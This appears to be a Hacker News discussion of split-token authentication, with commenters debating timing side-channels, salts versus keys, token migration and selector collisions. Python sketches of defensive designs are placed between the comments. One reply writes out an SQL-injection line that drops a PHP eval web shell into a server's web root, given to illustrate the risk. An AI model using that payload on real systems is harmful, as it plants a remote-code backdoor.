
Split Tokens: Token-Based Authentication Protocols Without Side-Channels - CiPHPerCoder
https://paragonie.com/blog/2017/02/split-tokens-token-based-authentication-protocols-without-side-channels
======
tbrowbdidnso
The author is mistaken about the side channel existing. In the most common
case of login and token generation it just doesn't.

With logins you compare the hashed password to a stored hash. The author
mentions that you can tell how much of the hashes match because the compare
function exits early at the first byte that differs. This might be true, but
it doesn't give you anything.

When using a secure hash function with a salt, the attacker being able to
guess how much of the two hashes match gives him no information because:

1) he doesn't know what hash is stored
2) he doesn't know what his password attempt hashed to
3) he doesn't know the salt

The only thing that the attacker knows is that he created a hash with his
attempt that matches the first few bytes of the real hash. If you use a strong
hashing algorithm this is useless information and will happen at random.
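
For reference, the early-exit behavior under discussion looks roughly like the sketch below. The function name `naive_equal` is hypothetical and the byte counter exists only to make the leak visible; `hmac.compare_digest` is the Python standard library's constant-time comparison.

```python
import hmac

def naive_equal(a: bytes, b: bytes):
    """Early-exit comparison; also reports how many bytes were examined."""
    if len(a) != len(b):
        return False, 0
    for i, (x, y) in enumerate(zip(a, b)):
        if x != y:
            # Returns at the first mismatch, so the run time depends on
            # the length of the matching prefix.
            return False, i + 1
    return True, len(a)

stored = bytes.fromhex("a1b2c3d4")
print(naive_equal(stored, bytes.fromhex("00b2c3d4")))  # (False, 1)
print(naive_equal(stored, bytes.fromhex("a1b2c300")))  # (False, 4)

# compare_digest is designed not to short-circuit on the first mismatch.
print(hmac.compare_digest(stored, bytes.fromhex("a1b2c300")))  # False
```

Whether the examined-byte count is useful to an attacker is exactly the point in dispute here: with a salted password hash the attacker cannot predict which bytes his guess produced.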

~~~
amluto
That's not how I read it at all. The author is saying that non-password tokens
can be vulnerable if you don't treat them the same way you'd treat passwords
and is essentially suggesting that they be split into username-like and
password-like fields.

There's another unrelated solution to the problem: make the tokens be AEAD [1]
output from a scheme with a global (perhaps rotated) secret or signed output
from an asymmetric cryptosystem. Then you're protected by the usual AEAD or
digital signature guarantees as long as you properly verify the token before
doing something silly like looking up the ciphertext in a database.

[1] Strictly speaking, encryption may be unnecessary depending on what's in
the token.
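
A minimal sketch of the "verify before lookup" idea, in Python. It uses a plain HMAC-SHA-256 tag rather than a full AEAD scheme (so the payload is authenticated but not encrypted, per the footnote), and `SERVER_KEY`, `issue_token`, and `verify_token` are hypothetical names, not anything from the article.

```python
import hashlib
import hmac
import secrets

SERVER_KEY = secrets.token_bytes(32)  # assumption: a global server-side secret
TAG_LEN = 32                          # SHA-256 output size in bytes

def issue_token(payload: bytes) -> str:
    """Append a MAC tag to the payload and hex-encode the result."""
    tag = hmac.new(SERVER_KEY, payload, hashlib.sha256).digest()
    return (payload + tag).hex()

def verify_token(token_hex: str):
    """Return the payload if the tag verifies, else None."""
    try:
        raw = bytes.fromhex(token_hex)
    except ValueError:
        return None
    if len(raw) <= TAG_LEN:
        return None
    payload, tag = raw[:-TAG_LEN], raw[-TAG_LEN:]
    expected = hmac.new(SERVER_KEY, payload, hashlib.sha256).digest()
    if not hmac.compare_digest(tag, expected):
        return None
    # Only after this point should the payload be used in a database query.
    return payload
```

A forged or modified token is rejected before any database access, so the lookup never sees attacker-chosen values.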

~~~
tbrowbdidnso
If you want to avoid timing attacks on the username and password, isn't the
easiest way just to hash them as if they're both passwords (at least on
initial login)? Since the hashes are cryptographically secure, you can't infer
any timing information from incorrect guesses.

~~~
CiPHPerCoder
We aren't interested in timing attacks on username+password, we're interested
in timing attacks on authentication schemes that only involve one string (i.e.
ONLY a token).

Simply hashing it before a lookup may be sufficient.

However, it's actually easier to reason about separating the search operation
(which leaks timing information unavoidably) from the validation operation
(which _shouldn't_ leak timing information if we can avoid it) than relying
on a hash function to blind the operation completely.
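
A rough Python sketch of that separation, not the article's reference implementation. The in-memory dict `TOKENS` stands in for the database table, and the 8-byte/24-byte split and the function names are assumptions made for illustration.

```python
import hashlib
import hmac
import secrets

# Hypothetical stand-in for the token table:
# selector -> (sha256 of verifier, user id)
TOKENS = {}

def issue(user_id: int) -> str:
    selector = secrets.token_hex(8)    # used for the lookup; timing may leak it
    verifier = secrets.token_hex(24)   # never stored in plaintext
    TOKENS[selector] = (hashlib.sha256(verifier.encode()).digest(), user_id)
    return selector + verifier         # the user still sees a single string

def validate(token: str):
    selector, verifier = token[:16], token[16:]
    row = TOKENS.get(selector)         # search step
    if row is None:
        return None
    stored_hash, user_id = row
    candidate = hashlib.sha256(verifier.encode()).digest()
    # Validation step: constant-time comparison of the two hashes.
    return user_id if hmac.compare_digest(candidate, stored_hash) else None
```

The search only ever touches the selector, so whatever the lookup leaks through timing says nothing about the verifier.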

~~~
foo101
Can you explain in what way it is easier to reason about separating the search
operation from the validation operation?

I can argue that it is easier to reason about simply hashing and then looking
up because once hashed, the lookup does not leak any timing information,
whereas in your solution the lookup does leak timing information.

Can you refute my argument?

~~~
CiPHPerCoder
Hashing is deterministic.

If you give the system m, you can probably deduce H(m). If you can send
candidates m, m', m'', etc. and compare the timing information of H(m), H(m'),
H(m''), etc. you can learn some information about the hash being stored.

This still probably isn't exploitable (you'd need a practical preimage attack,
at a minimum), but you're still leaking _some_ knowledge from the timing leak
of the comparison of the candidate hash with the stored hash.

With a split token approach, the verifier is totally unknown to the attacker.
You can generate a valid selector from timing observations... and that's it.
Game over. Find another way in the system.

If you have a 128-bit random string as your inputs, this will probably never
be guessed.

It's easier to reason about the security consequences of _no leak_ versus _a
minor, probably impractical leak_.

~~~
tbrowbdidnso
You can mix the hash with a salt that the attacker doesn't know and can never
learn. This is pretty standard and prevents the timing leak from revealing
anything about the hash. The only time this fails is if your hash function is
broken, and if that's the case you've got much bigger problems.

~~~
earthrise
The salt would need to be kept secret so it shouldn't be called a salt, it
should be called a key. The benefit of Scott's solution compared to this is
that you don't need to deal with all the usability problems associated with
keeping something secret (where should it be stored on the server? how should
it be backed up? how often should it be changed? etc.)
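
To illustrate the salt-versus-key distinction, here is a small Python sketch. The names `public_hash`, `keyed_hash`, and `server_key` are hypothetical, and HMAC-SHA-256 is just one reasonable choice of keyed hash.

```python
import hashlib
import hmac
import secrets

def public_hash(token: bytes) -> bytes:
    # Anyone who knows the candidate token can compute this offline.
    return hashlib.sha256(token).digest()

def keyed_hash(key: bytes, token: bytes) -> bytes:
    # Needs the server-side secret, which is why it is a key and not a salt.
    return hmac.new(key, token, hashlib.sha256).digest()

server_key = secrets.token_bytes(32)  # assumption: stored outside the database
guess = b"candidate-token"

attacker_view = public_hash(guess)           # the attacker can reproduce this
server_view = keyed_hash(server_key, guess)  # not reproducible without the key
```

The keyed variant blinds the comparison, at the cost of the key-management questions listed above.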

------
foo101
Why is the author using a convoluted scheme of splitting the token into a
selector and a verifier and then storing hash(verifier) in the database? Why
not use a simpler scheme of accepting a username and a token from the user and
storing hash(token) in the database?

In other words, my question is: Why do you need to split the token at all? Why
not store the hash of the entire token in the database?

So now, the username of the user becomes the selector, and the token becomes
the verifier. What is wrong with this simpler approach?

~~~
CiPHPerCoder
The idea here is to take an existing protocol which previously ONLY gave the
user a random 64 character hex string (representing 32 random bytes), and make
it more secure with no changes to what the user sees.

This is advantageous because such a change could be implemented without
invalidating existing tokens.

> What is wrong with this simpler approach?

Now you're requiring two pieces of data where the connecting user agent only
sends one. If the client is a piece of software, you're imposing a maintenance
burden on them to use the new approach.

What you're calling a "convoluted" scheme ensures a smooth transition. Better
security with no compatibility breaks.
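
As a sketch of what such a migration could look like in Python: each stored 64-character hex token is split at a fixed offset and only the hash of the second part is kept. The 16-character split point and the name `split_existing` are assumptions for illustration, not values taken from the article.

```python
import hashlib

SELECTOR_HEX_LEN = 16  # assumption: 8 bytes of selector, 24 bytes of verifier

def split_existing(token_hex: str):
    """Split a legacy 64-character hex token into (selector, sha256(verifier))."""
    if len(token_hex) != 64:
        raise ValueError("expected a 64-character hex token")
    selector = token_hex[:SELECTOR_HEX_LEN]
    verifier = token_hex[SELECTOR_HEX_LEN:]
    return selector, hashlib.sha256(verifier.encode("ascii")).hexdigest()

# Example with a dummy legacy token; the user keeps sending the same string.
legacy = "ab" * 32
selector, verifier_hash = split_existing(legacy)
```

Tokens already handed out keep working, because the server applies the same split to whatever string the client sends.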

~~~
foo101
If that's the case, then why not hash the entire token and store hash(token)
in the database? Then you can just query for:

    
    
        SELECT tokenid, userid FROM password_reset_tokens WHERE hashed_token = :hashed_token AND NOW() < expire_time
    

If you are worried that two tokens may collide to have the same hash, well
that problem is there with your split-token solution too where token1 and
token2 may collide such that token1 and token2 have the same selector and the
same hash(verifier).
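
For concreteness, the hash-then-lookup variant could be sketched like this in Python with an in-memory SQLite database. The table layout follows the query above, but the helper names are hypothetical and the current time is passed as a parameter because SQLite has no `NOW()`.

```python
import hashlib
import sqlite3
import time

db = sqlite3.connect(":memory:")
db.execute(
    "CREATE TABLE password_reset_tokens ("
    "tokenid INTEGER PRIMARY KEY, userid INTEGER, "
    "hashed_token TEXT UNIQUE, expire_time REAL)"
)

def store(userid, token, ttl=3600.0):
    # Only the SHA-256 digest of the token is written to the table.
    digest = hashlib.sha256(token.encode()).hexdigest()
    db.execute(
        "INSERT INTO password_reset_tokens (userid, hashed_token, expire_time) "
        "VALUES (?, ?, ?)",
        (userid, digest, time.time() + ttl),
    )

def lookup(token):
    # Hash the candidate first, then search on the digest.
    digest = hashlib.sha256(token.encode()).hexdigest()
    return db.execute(
        "SELECT tokenid, userid FROM password_reset_tokens "
        "WHERE hashed_token = ? AND ? < expire_time",
        (digest, time.time()),
    ).fetchone()
```

Here the search and the validation are the same operation, which is the property the two approaches disagree about.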

------
foo101
> If you're also concerned about read-write SQL injection being used to forge
> tokens for arbitrary user accounts, you may want to worry instead about the
> attacker using their access to compromise the filesystem and OS.

I don't get this part. Read-write SQL injection does not imply that the
attacker has access to the filesystem. The concern about RW-SQL injection is
still valid. If I can somehow prevent an attacker from modifying tokens via
RW-SQL injection, it is still an improvement, and I may not have to worry
about the filesystem being accessed because that may require a non-SQL attack
vector.

~~~
CiPHPerCoder
> I don't get this part. Read-write SQL injection does not imply that the
> attacker has access to the filesystem.

Theoretically no, but in practice, all you really need is

    
    
        SELECT '<?php eval($_GET["foo"]); ' INTO OUTFILE '/var/www/example.com/public_html/backdoor.php';
    

to get access to most servers.

------
foo101
> If your database's primary key is 32 bits (SERIAL in PostgreSQL, INT(11) in
> MySQL, etc.), you want at least 8 bytes for the selector.

32 bits = 4 bytes. How can we store an 8-byte selector in a 32-bit integer
then?

~~~
CiPHPerCoder
You're using a separate column (which is a CHAR, VARCHAR, or TEXT field) to
store the selector INSTEAD of the database primary key.

From the example query:

    
    
        SELECT tokenid, validator, userid FROM password_reset_tokens WHERE selector = :selector AND NOW() < expire_time
    

The columns in this query:

    
    
      - tokenid     -- the primary key
      - selector    -- some text data, used in WHERE clause
      - validator   -- some text data, not used in WHERE clause
      - expire_time -- timestamp
    

You have roughly a 50% chance of a collision in a 64-bit space after about
2^32 values (the birthday bound). That means a collision becomes about as
likely as not by the time you exhaust your 32-bit primary key space.

https://en.wikipedia.org/wiki/Birthday_attack
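
The birthday estimate can be checked numerically with the usual approximation p ≈ 1 - exp(-n(n-1)/2N). The Python sketch below uses a hypothetical helper name; the results are approximate and assume uniformly random selectors.

```python
import math

def collision_probability(n: float, bits: int) -> float:
    """Approximate probability of any collision among n random bits-bit values."""
    space = 2.0 ** bits
    # expm1 keeps precision when the probability is very small.
    return -math.expm1(-n * (n - 1) / (2.0 * space))

print(collision_probability(2**32, 64))           # roughly 0.39
print(collision_probability(1.1774 * 2**32, 64))  # roughly 0.50
print(collision_probability(2**16, 32))           # same ratio, roughly 0.39
```

So the 50% figure at 2^32 values is a rule of thumb: the approximation gives about 39% at exactly 2^32 and reaches 50% near 1.18 × 2^32.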

